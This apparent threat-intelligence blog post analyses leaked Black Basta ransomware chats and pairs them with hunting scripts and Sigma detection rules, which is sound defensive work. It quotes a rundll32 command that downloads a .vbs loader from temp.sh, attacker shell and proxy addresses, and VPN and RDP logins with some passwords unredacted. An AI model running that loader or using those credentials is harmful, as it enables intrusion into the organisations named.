How leaked communications confirm Microsoft’s threat insights and reveal a persistent, adaptive cybercrime enterprise exploiting hybrid infrastructure and social engineering at scale.
In the first quarter of 2025, Microsoft Threat Intelligence published a detailed overview of the evolving ransomware ecosystem, highlighting significant developments such as the use of commodity ransomware by nation-state actors and advanced hybrid cloud exploitation techniques. This coincided with a major leak of internal communications from the Black Basta ransomware group, providing unprecedented insight into the operational methods of one of the most active and technically capable ransomware collectives. Analysis of the leaked Black Basta chat logs reveals that the group remains fully operational despite the exposure. Key actors, including aliases such as @usernamegg, @lapa, and @usernameugway, continued coordinating attacks through shared infrastructure and custom tooling. Their methods align closely with the tactics, techniques, and procedures attributed by Microsoft to groups like Storm-1674, Storm-1811, and Storm-2410. These include the exploitation of Citrix and VPN portals, weak authentication on ESXi hypervisors, credential stuffing attacks, and the use of remote access utilities and scripts for payload delivery.
Particularly notable is the group’s active development of social engineering methods, such as impersonating IT support staff in phone calls, mirroring the techniques attributed to Storm-2410 in Microsoft’s report. Combined with the observed use of lightweight downloaders, memory-based loaders, and obfuscated commands via tools like PowerShell and rundll32.exe, this illustrates a shift toward stealthier, more precise attack delivery. Furthermore, the internal communications show an increasing emphasis on operational security and infrastructure resilience. The actors discuss rotating delivery domains, staging different botnets for specific functions, and avoiding detection through staggered attack timing and limited-volume delivery, which suggests a high level of coordination and long-term planning.
Taken together, this fusion of Microsoft’s threat intelligence with firsthand data from the Black Basta leak provides strong evidence of a sophisticated and adaptive ransomware ecosystem. It also reveals how closed ransomware groups like Black Basta continue to evolve tactically while maintaining persistent activity, even under significant public scrutiny. These findings carry important implications for defenders, underscoring the need for targeted detection, proactive hardening of cloud infrastructure, and heightened vigilance around social engineering threats.

Detailed Overview of Threat Actor Activities and Indicators
The Black Basta chat leak reveals a network of coordinated operators, primarily the aliases @usernamegg, @lapa, @usernameugway, and others, engaging in a structured campaign that mirrors Microsoft-attributed activity of groups such as Storm-1674, Storm-1811, and Storm-2410.
1. Exploitation of Known Services: Citrix, ESXi, Jenkins, VPNs
Participants frequently discuss and share infrastructure that exploits Citrix and Jenkins environments. One example includes:
Bot ID: LK-CITRIX02_REDACTED_5AB8D71B
IP | Country: 80.190.xxx.x6 | DE
Shell: 13.57.243.97:16854
Socks: 13.57.243.97:14983
The bot name marks a foothold on a Citrix host, aligning with Microsoft’s reporting on Citrix and VPN-based lateral movement.
There is also direct reference to weakly secured ESXi servers:
https:/58.171.144.24:10002/ui/ root hahaha ... this is basically an ESXi that apparently lets any password through
This demonstrates the abuse of ESXi misconfiguration, which Microsoft linked directly to Black Basta’s toolkit.
Jenkins scanning and exploitation is discussed:
we need to collect more Jenkins IPs, also FOFA, Shodan
indicating that they use tools like Shodan and FOFA for reconnaissance against exposed DevOps infrastructure.
2. Use of RDP, VPN, and Harvested Credentials
The chat contains massive dumps of RDP and VPN portals with associated credentials, such as:
https://darpan.kvs.REDACTED.in/rdweb/...;KVS@DLREDACTED https://start.elvyonline.nl/...;sdejong@elvyonline;e4256ohN
This suggests widespread access to remote environments — useful both for initial access and lateral movement.
There’s also mention of sslvpn_logon.shtml endpoints with admin-level usernames:
https://79.141.1.193/sslvpn_logon.shtml :superuser:REDACTED:REDACTED
indicating VPN brute-force or credential stuffing as an entry point.
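The two access patterns above, ESXi hosts accepting password guesses for root and SSL VPN portals hit with credential stuffing, leave the same shape in authentication logs: one source address cycling many usernames, or many failures for one account followed by a success. The script below is an added example, not code from the original post or from any vendor: it parses constructed log lines (the ESXi lines approximate the "Rejected/Accepted password for user ... from ..." text that hostd writes; the sslvpn key=value lines are a hypothetical gateway format, and you must adapt both regexes to what your own collector emits) and flags both patterns.

```python
"""Hunt for credential stuffing and brute-force success in ESXi and VPN auth logs.

Added example. The log lines below are constructed, not taken from the leak; the
ESXi lines mimic hostd.log wording, the sslvpn lines are a hypothetical format.
"""
import re
from collections import defaultdict

SAMPLE_LOG = """\
2025-02-11T09:14:02Z esx01 hostd: Rejected password for user root from 203.0.113.7
2025-02-11T09:14:05Z esx01 hostd: Rejected password for user root from 203.0.113.7
2025-02-11T09:14:09Z esx01 hostd: Rejected password for user root from 203.0.113.7
2025-02-11T09:14:12Z esx01 hostd: Accepted password for user root from 203.0.113.7
2025-02-11T09:20:11Z vpn-gw sslvpn: login failed user=jsmith src=198.51.100.23
2025-02-11T09:20:12Z vpn-gw sslvpn: login failed user=akumar src=198.51.100.23
2025-02-11T09:20:13Z vpn-gw sslvpn: login failed user=superuser src=198.51.100.23
2025-02-11T09:20:15Z vpn-gw sslvpn: login failed user=mlee src=198.51.100.23
2025-02-11T10:02:44Z vpn-gw sslvpn: login failed user=mlee src=192.0.2.50
2025-02-11T10:02:50Z vpn-gw sslvpn: login ok user=mlee src=192.0.2.50
"""

# One regex per log producer; both normalise to ts / outcome / user / src.
ESXI_RE = re.compile(
    r"(?P<ts>\S+) \S+ hostd: (?P<outcome>Rejected|Accepted) password for user "
    r"(?P<user>\S+) from (?P<src>\S+)"
)
VPN_RE = re.compile(
    r"(?P<ts>\S+) \S+ sslvpn: login (?P<outcome>failed|ok) user=(?P<user>\S+) src=(?P<src>\S+)"
)


def parse(text: str) -> list[dict]:
    """Turn raw lines into normalised events; lines that match neither format are skipped."""
    events = []
    for line in text.splitlines():
        m = ESXI_RE.match(line) or VPN_RE.match(line)
        if not m:
            continue
        ev = m.groupdict()
        ev["success"] = ev["outcome"] in ("Accepted", "ok")
        events.append(ev)
    return events


def credential_stuffing(events: list[dict], min_users: int = 3) -> dict[str, list[str]]:
    """Source IPs that failed against at least min_users distinct accounts (spray / stuffing)."""
    users_by_src: dict[str, set] = defaultdict(set)
    for ev in events:
        if not ev["success"]:
            users_by_src[ev["src"]].add(ev["user"])
    return {src: sorted(users) for src, users in users_by_src.items() if len(users) >= min_users}


def success_after_failures(events: list[dict], min_failures: int = 3) -> list[tuple[str, str]]:
    """(src, user) pairs where a success followed at least min_failures consecutive failures.

    Events are assumed to be in chronological order, as they are in a log file.
    """
    streak: dict[tuple[str, str], int] = defaultdict(int)
    hits = []
    for ev in events:
        key = (ev["src"], ev["user"])
        if ev["success"]:
            if streak[key] >= min_failures:
                hits.append(key)
            streak[key] = 0
        else:
            streak[key] += 1
    return hits


if __name__ == "__main__":
    evs = parse(SAMPLE_LOG)
    print("stuffing sources:", credential_stuffing(evs))
    print("brute-force successes:", success_after_failures(evs))
```

Run on real data, feed it a day of forwarded ESXi syslog plus the gateway's auth log and raise min_users to fit your user population; a source hitting more than a handful of distinct accounts is never a typo, and a root success from an address with a failure streak behind it is the "any password" host the operators were laughing about.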
3. Social Engineering via IT Spoofing (Storm-2410, Storm-1674-like TTPs)
The actors openly coordinate voice-based social engineering, as seen in this exchange:
can we make the call come through as if from the IT department? ... yes, we are doing exactly that right now
This mirrors Microsoft’s report on fake IT helpdesk calls by Storm-2410 and Storm-1674 using tools like Quick Assist and PowerShell.
4. Command-and-Control, Scripting, and Obfuscation
The use of PowerShell-based or loader-based execution is shown, such as:
rundll32.exe dll.dll,Enter http://temp.sh/ctGHj/downloader.vbs
These are indicative of custom loaders or commodity malware delivery — supporting Microsoft’s note on Noiserv-like C2 channels and dual use of public and bespoke tools.
Bots and SOCKS proxies are coordinated for remote access and persistence:
Socks: 5.8.18.20:3026,3027 ssh cmd, INNOPHOS:REDACTED:Ilovepizza25!
5. Anti-Detection and Operational Security
The actors monitor blacklisting of infrastructure and carefully throttle delivery to avoid detection:
I think if we send a lot, the domain will get blacklisted fast ... let's go targeted at first
This reflects a real-time anti-spam and blacklist evasion strategy, an operational behavior typical of top-tier ransomware operators.
The chat reveals a tightly organized group using both commodity and custom tooling, consistent with RaaS operations and the “closed” nature of Black Basta as a platform. The level of collaboration, infrastructure sharing, and live coordination supports the notion of these actors as high-tier ransomware affiliates or core members.
Anticipatory Intelligence Based on the Dataset
Continued Focus on ESXi and Citrix Targets
There is persistent operational discussion around ESXi servers with no effective authentication and default-password acceptance, indicating this vector remains both viable and preferred. Additionally, Citrix infrastructure, especially SSL VPN login portals, is repeatedly targeted with brute-force and credential stuffing, as in:
this is basically an ESXi that apparently lets any password through
LK-CITRIX02_cgaldi_5AB8D71B
sslvpn_logon.shtml :superuser:REDACTED:REDACTED
Implication: Actors are likely to continue leveraging misconfigured ESXi environments and unpatched Citrix SSL VPN instances in upcoming campaigns.
Increased Use of Fake IT Support for Initial Access
The actors are actively refining voice-based pretexts (e.g., pretending to be from an IT department) and coordinating spoofed calls through a call center:
can we make the call come through as if from the IT department?
...
yes, we are doing exactly that right now
Implication: Expect a broader rollout of voice phishing (vishing) as an access method potentially using automation or integrating deepfakes or spoofed Teams identities in the near future.
Resilient Payload Delivery via Simple Scripts & Multi-hosting
Tools like rundll32.exe, .vbs loaders, and multi-domain file delivery (e.g., transfer.sh, temp.sh, send.vis.ee) continue to appear. Actors discuss rotating domains to evade detection:
I'll spread it across different domains
http://temp.sh/ctGHj/downloader.vbs
Implication: Malware delivery will likely remain lightweight, using fileless or memory-only techniques while relying on rotating public hosting for payload evasion.
Adversary Operational Security Is Increasing
There are deliberate attempts to avoid blacklisting, delay domain saturation, and limit mass emailing:
the domain will get blacklisted fast
let's go targeted at first
Implication: Future attacks may appear lower volume but more targeted, with careful pacing to avoid detection especially in phishing and initial access stages.
Internal Coordination Suggests Scalability
Actors operate in structured workflows: discussing test windows, coordinated times, role distribution, and infrastructure segmentation (e.g., “we are not loading from this bot group”):
we are not loading from this bot group
into work
since that is the path for movement
Implication: This suggests the group may scale operations by assigning infrastructure subsets for distinct phases (e.g., access, staging, encryption) mirroring advanced affiliate models.
Projected Operational Continuity
| TTP / Pattern | Indicator in Logs | Likely Continuation |
|---|---|---|
| ESXi/Citrix Exploits | Auth bypass, brute-force | High |
| Fake IT Call Vishing | Coordinated spoofing efforts | High |
| Simple Script Loaders | .vbs, rundll32.exe, C2 callbacks | Moderate-High |
| Blacklist Evasion Tactics | Staggered sends, domain rotation | High |
| Bot Infrastructure Segmentation | Defined bot group usage | Moderate |
This projection is strictly based on the dataset’s behavioral indicators.
In Q1 2025, Microsoft’s report signals critical developments in the ransomware ecosystem: rising usage of commodity ransomware by state actors, growing exploitation of hybrid cloud environments, and persistent abuse of social engineering and newly disclosed vulnerabilities. When this is correlated with the leaked Black Basta chat dataset, a highly coordinated threat landscape emerges, rooted in tactical consistency, adaptive delivery, and operational maturity.
Strategic Conclusions
Black Basta Continues Operating as a High-Tier Closed RaaS Collective
Despite Microsoft highlighting the leak of internal chats, the dataset shows no operational collapse. Instead, threat actors like @usernamegg, @lapa, and others maintain:
- Exploit chains involving Citrix, ESXi, Jenkins, and VPN portals.
- Credential harvesting and credential reuse.
- Coordinated deployment scripts using lightweight tools like rundll32, .vbs, and PowerShell.
This persistence suggests Black Basta’s operational core remains intact, resilient to internal exposure, and likely segmented enough to withstand compromise.
High Overlap with Storm-Labeled Activity (Storm-1674, Storm-2410, Storm-1811)
Microsoft identifies overlaps between Black Basta activity and groups such as Storm-1674 and Storm-2410. The chat logs substantiate this:
- Storm-1674: Use of PowerShell, C2 infrastructure like Noiserv, ESXi/Citrix exploitation.
- Storm-2410: Social engineering via fake IT calls explicitly coordinated in the logs for initial access.
- Storm-1811: Shared infrastructure, later silence mirrored by actor drop-off post-February.
This supports Microsoft’s assessment of convergence between multiple actor clusters inside or affiliated with the Black Basta ecosystem.
Anticipatory Indicators Signal Tactical Evolution
Looking forward, data in the chat logs suggests:
- Vishing will become more automated and precise, as actors refine IT spoofing pretexts.
- Infrastructure segmentation (e.g., distinct bot groups, SOCKS routing) will allow resilience and scale.
- Misconfigured cloud and hybrid systems (e.g., ESXi accepting any password) will remain key targets.
- Commodity tools (e.g., PowerShell, downloaders) will continue as payload vectors — supporting state actors like Moonstone Sleet moving into this space, as Microsoft noted.
Conclusion
Black Basta represents a stable, modular RaaS platform increasingly entangled with both cybercriminal and state-linked actors. Despite public leaks, the group continues leveraging both advanced infrastructure exploitation and low-friction access techniques like fake IT support. Microsoft’s threat report and the internal chat logs converge on one insight: ransomware operations are growing more adaptable, persistent, and collaborative, not less.
Threat Hunting Opportunities
1. Exploitation of Citrix and VPN Portals
Detects unauthorized access attempts to Citrix and VPN portals, which Black Basta operators have been known to exploit.
Sigma Rule:
title: Suspicious Citrix/VPN Portal Access
# The id below is not a valid RFC 4122 UUID (it contains the letters g-p); generate
# a fresh UUID before loading this rule into a pipeline.
id: 1a2b3c4d-5e6f-7g8h-9i0j-k1l2m3n4o5p6
status: experimental
description: >
  Detects failed Windows logons (4625) where the workstation or account name identifies a
  Citrix or VPN gateway. This assumes the gateway authenticates users against a domain
  controller whose Security log is collected; a single hit is noise, so review by source
  address and volume to separate credential stuffing from mistyped passwords.
author: Your Name
date: 2025-04-17
tags:
  - attack.credential-access
  - attack.t1110
logsource:
  product: windows
  service: security
detection:
  selection:
    EventID: 4625
    LogonType: 3
  selection_gateway:
    - WorkstationName|contains:
        - 'Citrix'
        - 'VPN'
    - TargetUserName|contains:
        - 'Citrix'
        - 'VPN'
  condition: selection and selection_gateway
fields:
  - TargetUserName
  - WorkstationName
  - IpAddress
  - SubStatus
falsepositives:
  - Users mistyping passwords at the gateway
level: medium
2. Abuse of ESXi Hypervisors
Description: Monitors for suspicious activities targeting ESXi hypervisors, such as login attempts with default or weak credentials.
Sigma Rule:
title: Suspicious ESXi Hypervisor Access Attempts
# The id below is not a valid RFC 4122 UUID; generate a fresh one before use.
id: 2b3c4d5e-6f7g-8h9i-0j1k-l2m3n4o5p6q7
status: experimental
description: >
  Detects rejected password authentication for the root or admin account on an ESXi host
  as written to hostd.log / auth.log and forwarded via syslog. ESXi emits no Windows event
  IDs, so the signal is the syslog text itself. Pivot on the source address: many
  rejections followed by an "Accepted password" line from the same address is a brute-force
  success, and an accepted root logon from outside the management network on a host the
  operators describe as accepting any password is the misconfiguration discussed above.
  Verify the message strings against your own hosts' logs before deploying.
author: Your Name
date: 2025-04-17
tags:
  - attack.credential-access
  - attack.t1110
logsource:
  product: linux
  service: syslog
  definition: ESXi hosts forwarding /var/log/hostd.log and /var/log/auth.log via remote syslog
detection:
  keywords:
    - 'Rejected password for user root from'
    - 'Rejected password for user admin from'
  condition: keywords
falsepositives:
  - Administrators, vCenter or backup integrations using stale credentials
level: medium
3. Use of Remote Access Tools
Description: Detects the execution of remote access tools like AnyDesk or TeamViewer, which may be used for unauthorized access.
Sigma Rule:
title: Execution of Remote Access Tools
# The id below is not a valid RFC 4122 UUID; generate a fresh one before use.
id: 3c4d5e6f-7g8h-9i0j-1k2l-m3n4o5p6q7r8
status: experimental
description: Detects execution of remote access tools that are not part of the organisation's approved remote support tooling.
author: Your Name
date: 2025-04-17
tags:
  - attack.command-and-control
  - attack.t1219
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith:
      - '\AnyDesk.exe'
      - '\TeamViewer.exe'
      - '\RemoteUtilities.exe'
  condition: selection
fields:
  - Image
  - CommandLine
  - ParentImage
  - User
falsepositives:
  - Sanctioned remote support; allow-list the hosts or users permitted to run these tools
level: medium
4. Obfuscated PowerShell Commands
Description: Identifies the use of obfuscated PowerShell commands, a technique often employed to evade detection.
Sigma Rule:
title: Obfuscated PowerShell Command Execution
# The id below is not a valid RFC 4122 UUID; generate a fresh one before use.
id: 4d5e6f7g-8h9i-0j1k-2l3m-n4o5p6q7r8s9
status: experimental
description: Detects PowerShell command lines that decode Base64 or evaluate strings at run time, both common in loaders. Covers Windows PowerShell and PowerShell 7 (pwsh.exe).
author: Your Name
date: 2025-04-17
tags:
  - attack.execution
  - attack.t1059.001
  - attack.defense-evasion
  - attack.t1027
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith:
      - '\powershell.exe'
      - '\pwsh.exe'
    CommandLine|contains:
      - 'FromBase64String'
      - 'Invoke-Expression'
  condition: selection
fields:
  - Image
  - CommandLine
  - ParentImage
  - User
falsepositives:
  - Administrative and deployment scripts; baseline ParentImage and User before alerting at this level
level: high
5. Ransom Note File Creation
Description: Monitors for the creation of ransom note files, which are indicative of ransomware activity.
Sigma Rule:
title: Ransom Note File Creation
# The id below is not a valid RFC 4122 UUID; generate a fresh one before use.
id: 5e6f7g8h-9i0j-1k2l-3m4n-o5p6q7r8s9t0
status: experimental
description: Detects creation of files whose names match common ransom notes. Uses the Sigma file_event category and its TargetFilename field so that backends can map it to Sysmon Event ID 11 or equivalent EDR telemetry.
author: Your Name
date: 2025-04-17
tags:
  - attack.impact
  - attack.t1486
logsource:
  category: file_event
  product: windows
detection:
  selection:
    TargetFilename|endswith:
      - '\readme.txt'
      - '\instructions.html'
      - '\decrypt_files.txt'
  condition: selection
fields:
  - TargetFilename
  - Image
  - User
  - ComputerName
falsepositives:
  - Software packages that ship a readme.txt; one event is low signal, the same name written into many directories within minutes is not
level: high
6. CVE-2023-4966 Exploitation Attempt: Citrix ADC Sensitive Information Disclosure
Description: Detects potential exploitation attempts of CVE-2023-4966, a vulnerability in Citrix ADC and NetScaler Gateway that allows sensitive information disclosure.
Sigma Rule:
title: CVE-2023-4966 Exploitation Attempt - Citrix ADC Sensitive Information Disclosure
id: ff349b81-617f-4af4-924f-dbe8ea9bab41
status: test
description: Detects potential exploitation attempt of CVE-2023-4966 via proxy logs.
author: Nasreddine Bencherchali (Nextron Systems), Michael Haag (STRT)
date: 2023-11-28
references:
  - https://support.citrix.com/article/CTX579459
  - https://attackerkb.com/topics/2faW2CxJgQ/cve-2023-4966
  - https://www.rapid7.com/blog/post/2023/10/25/etr-cve-2023-4966-exploitation-of-citrix-netscaler-information-disclosure-vulnerability/
  - https://www.assetnote.io/resources/research/citrix-bleed-leaking-session-tokens-with-cve-2023-4966
  - https://github.com/assetnote/exploits/tree/main/citrix/CVE-2023-4966
tags:
  - detection.emerging-threats
  - attack.initial-access
  - attack.t1190
  - cve.2023-4966
logsource:
  category: proxy
detection:
  selection:
    cs-method: 'GET'
    cs-uri|contains: '/oauth/idp/.well-known/openid-configuration'
    sc-status: 200
  condition: selection
falsepositives:
  - Vulnerability scanners
level: medium
Source: Detection.FYI
7. Remote Access Tool Services Installation
Detects the installation of services associated with remote access tools, which are often used by threat actors for unauthorized access.
Sigma Rule:
title: Remote Access Tool Services Have Been Installed - System
id: 1a31b18a-f00c-4061-9900-f735b96c99fc
status: test
description: Detects service installation of different remote access tools software.
author: Connor Martin, Nasreddine Bencherchali
date: 2022-12-23
modified: 2023-06-22
tags:
  - attack.persistence
  - attack.t1543.003
  - attack.t1569.002
logsource:
  category: system
  product: windows
detection:
  selection:
    ServiceName|contains:
      - 'AnyDesk'
      - 'TeamViewer'
      - 'UltraVNC'
      - 'NetSupport'
  condition: selection
falsepositives:
  - Legitimate installations of remote access tools
level: medium
Source: Valhalla
8. Outbound Network Connection To Public IP Via Winlogon
Detects instances where the ‘winlogon.exe’ process initiates network communications with public IP addresses, which may indicate malicious activity.
Sigma Rule:
title: Outbound Network Connection To Public IP Via Winlogon
id: 7610a4ea-c06d-495f-a2ac-0a696abcfd3b
status: test
description: Detects a "winlogon.exe" process that initiates network communications with public IP addresses. Loopback, RFC 1918, link-local and the IPv6 equivalents are filtered out; without that filter a 0.0.0.0/0 match fires on every connection winlogon makes, including normal domain traffic.
author: Christopher Peacock @securepeacock, SCYTHE @scythe_io
date: 2023-04-28
modified: 2024-03-12
tags:
  - attack.defense-evasion
  - attack.execution
  - attack.command-and-control
  - attack.t1218.011
logsource:
  category: network_connection
  product: windows
detection:
  selection:
    Image: 'C:\Windows\System32\winlogon.exe'
    Initiated: 'true'
  filter_main_local_ip:
    DestinationIp|cidr:
      - '127.0.0.0/8'
      - '10.0.0.0/8'
      - '172.16.0.0/12'
      - '192.168.0.0/16'
      - '169.254.0.0/16'
      - '::1/128'
      - 'fe80::/10'
      - 'fc00::/7'
  condition: selection and not 1 of filter_main_*
falsepositives:
  - Legitimate remote desktop connections
level: high
Source: Valhalla
Threat Hunting Opportunities: Detecting the Ransomware Itself
9. Suspicious PowerShell Execution
Detects the execution of PowerShell with encoded commands, a common technique used by ransomware for obfuscation.
Sigma Rule:
title: Suspicious PowerShell Execution
id: cbd8e156-dc48-4dbf-939f-62e8c7b27b60
status: experimental
description: Detects execution of potentially malicious PowerShell commands used in ransomware attacks. The encoded-command switches are matched with surrounding spaces so that unrelated parameters such as -ExecutionPolicy and -ErrorAction do not trigger the rule.
author: Abhinav Pandey
date: 2024-11-19
logsource:
  category: process_creation
  product: windows
detection:
  selection_img:
    Image|endswith:
      - '\powershell.exe'
      - '\pwsh.exe'
  selection_cli:
    CommandLine|contains:
      - ' -e '
      - ' -ec '
      - ' -enc '
      - ' -encodedcommand '
      - 'Invoke-Expression'
      - 'IEX'
  condition: all of selection_*
fields:
  - Image
  - CommandLine
  - ParentImage
  - User
falsepositives:
  - Management tooling that launches encoded PowerShell; baseline ParentImage before alerting at this level
level: high
Source: Cyversity — Effective Threat Hunting: Black Basta Ransomware
10. Ransomware File Extension Creation
Monitors for the creation of files with extensions commonly used by Black Basta ransomware, such as .ransom or .basta.
Sigma Rule:
title: Ransomware File Extension Creation
id: 05329b66-1eb3-47fd-a8f1-c5c58e1d5ef7
status: experimental
description: Detects creation of files with extensions indicative of ransomware encryption. Uses the Sigma file_event category and its TargetFilename field so that backends can map it to file creation telemetry.
author: Abhinav Pandey
date: 2024-11-19
logsource:
  category: file_event
  product: windows
detection:
  selection:
    TargetFilename|endswith:
      - '.ransom'
      - '.basta'
  condition: selection
fields:
  - TargetFilename
  - Image
  - User
  - ComputerName
falsepositives:
  - Unlikely
level: high
Source: Cyversity — Effective Threat Hunting: Black Basta Ransomware
11. Execution of Remote Access Tools
Detects the execution of remote access tools like AnyDesk, Quick Assist, or related payloads, which are often used by attackers for unauthorized access.
Sigma Rules
title: Execution of Remote Access Tools
id: 8a5c8e42-39dc-4c4f-a5b6-96bf5dbd93c9
status: experimental
description: Detects execution of tools like AnyDesk, Quick Assist, or related payloads.
author: Abhinav Pandey
date: 2024-11-19
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith:
      - '\AnyDesk.exe'
      - '\QuickAssist.exe'
      - '\AntispamAccount.exe'
      - '\AntispamUpdate.exe'
      - '\AntispamConnectUS.exe'
  condition: selection
fields:
  - Image
  - CommandLine
  - ParentImage
  - User
falsepositives:
  - Quick Assist and AnyDesk in sanctioned helpdesk use; the Antispam*.exe names carry the signal and can be split into their own rule
level: high
Source: Cyversity — Effective Threat Hunting: Black Basta Ransomware
12. Shadow Copy Deletion via vssadmin
Identifies the use of vssadmin.exe to delete shadow copies, a tactic used by ransomware to prevent system recovery.
Sigma Rule:
title: Shadow Copy Deletion via vssadmin
# 100012 is a Wazuh rule ID, not a Sigma UUID; generate a UUID if this rule is
# converted for another backend.
id: 100012
status: experimental
description: Detects usage of vssadmin.exe to delete shadow copies. Both substrings are required (contains|all); a plain list under one field is an OR in Sigma and would also fire on "vssadmin list shadows".
author: Wazuh Team
date: 2024-11-19
tags:
  - attack.impact
  - attack.t1490
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith: '\vssadmin.exe'
    CommandLine|contains|all:
      - 'delete'
      - 'shadows'
  condition: selection
fields:
  - Image
  - CommandLine
  - ParentImage
  - User
falsepositives:
  - Backup software or administrators clearing old shadow copies
level: high
Source: Wazuh — How to detect Black Basta malware with Wazuh
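Three of the rules above hinge on Sigma semantics that are easy to get wrong: a value list under one field is an OR unless `|all` is added, a bare `-e` substring matches `-ExecutionPolicy`, and a CIDR match of `0.0.0.0/0` fires on every connection unless private ranges are filtered out. The script below is an added example, not code from the original post, Wazuh, or the Sigma project: a minimal matcher for exactly the subset of Sigma those rules use (`contains`, `endswith`, `all`, `cidr`, and the conditions `selection` / `selection and not filter`), run over constructed process-creation and network-connection events so the difference between each loose and tightened rule is visible in the output.

```python
"""Minimal Sigma matcher for the modifiers the rules on this page use. Added example.

The events are constructed, not taken from the leak or from real telemetry.
"""
from __future__ import annotations

import ipaddress
from typing import Any


def _value_matches(value: Any, modifiers: list[str], patterns: list[Any]) -> bool:
    """Apply Sigma modifiers to one field value. Strings compare case-insensitively."""
    if value is None:
        return False
    hits = []
    for pat in patterns:
        if "cidr" in modifiers:
            hit = ipaddress.ip_address(value) in ipaddress.ip_network(pat, strict=False)
        else:
            v, p = str(value).lower(), str(pat).lower()
            if "contains" in modifiers:
                hit = p in v
            elif "endswith" in modifiers:
                hit = v.endswith(p)
            elif "startswith" in modifiers:
                hit = v.startswith(p)
            else:
                hit = v == p
        hits.append(hit)
    # Sigma: a list of values is OR, unless the 'all' modifier makes it AND.
    return all(hits) if "all" in modifiers else any(hits)


def _selection_matches(selection: dict, event: dict) -> bool:
    """Every field in a selection map must match (AND across fields)."""
    for key, patterns in selection.items():
        field, *modifiers = key.split("|")
        if not isinstance(patterns, list):
            patterns = [patterns]
        if not _value_matches(event.get(field), modifiers, patterns):
            return False
    return True


def evaluate(rule: dict, event: dict) -> bool:
    """Evaluate the two condition shapes used on this page."""
    det = rule["detection"]
    cond = det["condition"]
    if cond == "selection":
        return _selection_matches(det["selection"], event)
    if cond == "selection and not filter":
        return _selection_matches(det["selection"], event) and not _selection_matches(det["filter"], event)
    raise ValueError(f"unsupported condition: {cond}")


RULES = {
    # list under one field is OR, so 'vssadmin list shadows' also fires
    "vss_or": {"detection": {"selection": {"Image|endswith": "\\vssadmin.exe",
                                            "CommandLine|contains": ["delete", "shadows"]},
                              "condition": "selection"}},
    # both substrings required
    "vss_all": {"detection": {"selection": {"Image|endswith": "\\vssadmin.exe",
                                             "CommandLine|contains|all": ["delete", "shadows"]},
                               "condition": "selection"}},
    # bare '-e' also matches -ExecutionPolicy; the spaced forms do not
    "ps_loose": {"detection": {"selection": {"Image|endswith": "\\powershell.exe",
                                              "CommandLine|contains": ["-e"]},
                                "condition": "selection"}},
    "ps_tight": {"detection": {"selection": {"Image|endswith": "\\powershell.exe",
                                              "CommandLine|contains": [" -e ", " -ec ", " -enc ", " -encodedcommand "]},
                                "condition": "selection"}},
    # winlogon to a public address: exclude loopback, RFC 1918 and link-local first
    "winlogon_public": {"detection": {
        "selection": {"Image": "C:\\Windows\\System32\\winlogon.exe", "Initiated": "true"},
        "filter": {"DestinationIp|cidr": ["127.0.0.0/8", "10.0.0.0/8", "172.16.0.0/12",
                                          "192.168.0.0/16", "169.254.0.0/16"]},
        "condition": "selection and not filter"}},
}

EVENTS = [  # constructed sample telemetry
    {"id": "E1", "Image": "C:\\Windows\\System32\\vssadmin.exe",
     "CommandLine": "vssadmin list shadows"},
    {"id": "E2", "Image": "C:\\Windows\\System32\\vssadmin.exe",
     "CommandLine": "vssadmin.exe delete shadows /all /quiet"},
    {"id": "E3", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe -ExecutionPolicy Bypass -File C:\\tmp\\update.ps1"},
    {"id": "E4", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"id": "N1", "Image": "C:\\Windows\\System32\\winlogon.exe", "Initiated": "true",
     "DestinationIp": "10.0.0.5"},
    {"id": "N2", "Image": "C:\\Windows\\System32\\winlogon.exe", "Initiated": "true",
     "DestinationIp": "203.0.113.9"},
]


def run_all(rules: dict = RULES, events: list[dict] = EVENTS) -> dict[str, list[str]]:
    """Return, per rule name, the ids of the events it fires on."""
    return {name: [e["id"] for e in events if evaluate(rule, e)] for name, rule in rules.items()}


if __name__ == "__main__":
    for name, ids in run_all().items():
        print(f"{name:16} -> {ids}")
```

The matcher is deliberately small; for production use convert the rules with sigma-cli into your backend's query language and test them the same way, with one benign and one malicious event per rule, before they go live. The point the output makes is that `vss_or` and `ps_loose` fire on the benign events E1 and E3 while `vss_all` and `ps_tight` do not.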
13. Creation of Ransom Note Files
Description: Monitors for the creation of ransom note files, which are indicative of ransomware activity.
Sigma Rule:
title: Creation of Ransom Note Files
# 100013 is a Wazuh rule ID, not a Sigma UUID; generate a UUID if this rule is
# converted for another backend.
id: 100013
status: experimental
description: Detects creation of ransom note files commonly used by ransomware. Uses the Sigma file_event category and its TargetFilename field so that backends can map it to Sysmon Event ID 11 or equivalent telemetry.
author: Wazuh Team
date: 2024-11-19
tags:
  - attack.impact
  - attack.t1486
logsource:
  category: file_event
  product: windows
detection:
  selection:
    TargetFilename|endswith:
      - '\readme.txt'
      - '\instructions.html'
      - '\decrypt_files.txt'
  condition: selection
fields:
  - TargetFilename
  - Image
  - User
  - ComputerName
falsepositives:
  - Software packages that ship a readme.txt; alert on the same name written into many directories within minutes rather than on single events
level: high
Source: Wazuh — How to detect Black Basta malware with Wazuh
Inside Black Basta: Ransomware Resilience and Evolution After the Leak was originally published in Detect FYI on Medium, where people are continuing the conversation by highlighting and responding to this story.